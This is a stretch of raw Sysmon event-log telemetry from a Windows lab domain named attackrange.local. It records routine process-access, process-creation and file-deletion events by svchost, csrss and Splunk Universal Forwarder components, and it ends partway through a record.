07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:26.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.240{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4F6-60EB-7D79-00000000D001}224C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.240{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F6-60EB-7D79-00000000D001}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.241{0C1E0330-F4F6-60EB-7D79-00000000D001}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:27.792{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=769F1AAFB3313D34CA29E0EC84D82AC0,SHA256=1A93F6C8E8E6F7F2C66DEC4193AEDC71EF1AD1B9AE26003B9F4A43871A260CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1BDB78993D6D5EF161BBB65DA121AEB,SHA256=39FE379D84DEA2D9159A83D45A6060A9C77515E8434EC48050B5A57C4BA856BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.694{0C1E0330-F4F7-60EB-7F79-00000000D001}12523404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F7-60EB-7F79-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:27.553{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.553{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.553{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4F7-60EB-7F79-00000000D001}1252C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.553{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F7-60EB-7F79-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.554{0C1E0330-F4F7-60EB-7F79-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.069{0C1E0330-F4F6-60EB-7E79-00000000D001}2896840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program 